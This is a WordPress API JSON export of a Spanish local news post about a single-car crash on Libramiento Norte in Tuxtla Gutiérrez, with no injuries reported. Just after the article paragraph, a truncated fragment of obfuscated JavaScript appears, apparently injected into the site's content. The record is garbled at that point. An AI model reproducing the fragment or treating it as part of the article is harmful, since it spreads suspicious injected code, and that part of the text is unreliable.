{"id":14076,"date":"2024-02-10T00:43:42","date_gmt":"2024-02-10T00:43:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14076"},"modified":"2024-02-10T00:43:43","modified_gmt":"2024-02-10T00:43:43","slug":"se-accidenta-unidad-en-el-el-libramiento-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14076","title":{"rendered":"Se accidenta unidad en el el Libramiento Norte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525716871-768x1024.jpg\" alt=\"\" class=\"wp-image-14077\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525716871-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525716871-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1707525716871.jpg 1080w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 9 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la tarde se accident\u00f3 un veh\u00edculo compacto de color azul en el Libramiento Norte y Calle Central de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la unidad circulaba en el carril de Poniente a Oriente cuando perdi\u00f3 el control al ingresar a una curva.Posteriormente se subi\u00f3 al camell\u00f3n central y se impact\u00f3 contra unos triangulos de concreto, quedando la parte frontal desecha.Afortunadamente el accidente no dej\u00f3 v\u00edctimas que lamentar pero s\u00ed cuantiosos da\u00f1os materiales.Finalmente una gr\u00faa particular traslad\u00f3 la unidad a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 9 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la tarde se accident\u00f3 un veh\u00edculo compacto de color azul en el Libramiento Norte y Calle Central de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la unidad circulaba en el carril de Poniente a Oriente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14077,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14076","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14076","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14076"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14076\/revisions"}],"predecessor-version":[{"id":14078,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14076\/revisions\/14078"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14077"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14076"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14076"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14076"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}